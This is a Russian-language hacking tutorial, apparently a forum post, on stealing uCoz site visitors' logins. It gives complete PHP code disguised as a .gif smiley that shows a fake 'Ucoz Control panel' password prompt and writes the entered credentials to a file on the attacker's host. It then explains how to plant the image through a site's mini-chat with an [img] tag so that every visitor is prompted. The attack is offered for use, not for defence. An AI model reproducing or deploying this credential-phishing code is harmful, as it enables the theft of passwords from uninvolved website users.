Я надеюсь, что и я скоро стану таким =).
Итак, приступим...
В начале нужно зарегить host обязательно с поддержкой php (что-то вроде http://mywebsite.phphost.net). После завершения регистрации загружаем на ftp скрипт, а затем ставим права на файл goodsmile.gif и на .txt файл, например: pass.txt (сюда должны присылаться пароли пользователей взломанного сайта). Затем скачайте любой смайлик с расширением .gif (типа good.gif).
Затем откройте редактор Notepad и набираете следующее:
Code
header("Content-type: image/gif");
$image = imagecreatefromgif(' goodsmile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('pass.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы всё напишите, сохраните файл под именем goodsmile, потом замените расширение на .gif.
Затем выберите любой UCOZ’овский сайт, например http://other.ucoz.ru/ как обычно, у них есть мини-чат, как правило с правой стороны. Далее - для начала регистрируетесь на сайте, затем в мини-чате вводите логин, а в сообщении напишите следующее:
Code
[img] http://mywebsite.phphost.net/%20goodsmile.gif [/img]
Нажимаем ОК
. Если после этих манипуляций в мини-чате, вместо введенного сообщения появился смайлик - радуйтесь, потому что сайт - уязвимый. После этих манипуляций, у всех кто будет посещать данную страницу, (в моем примере это http:// other.ucoz.ru/) будет выплывать форма, в которой необходимо будет прописать свои логин и пароль. И у вас, при входе на данный сайт, эта форма также будет появляться. А все, введенные в эту форму логины и пароли будут отправляться в файл pass.txt, который вы создавали в самом начале и заливали на ftp.
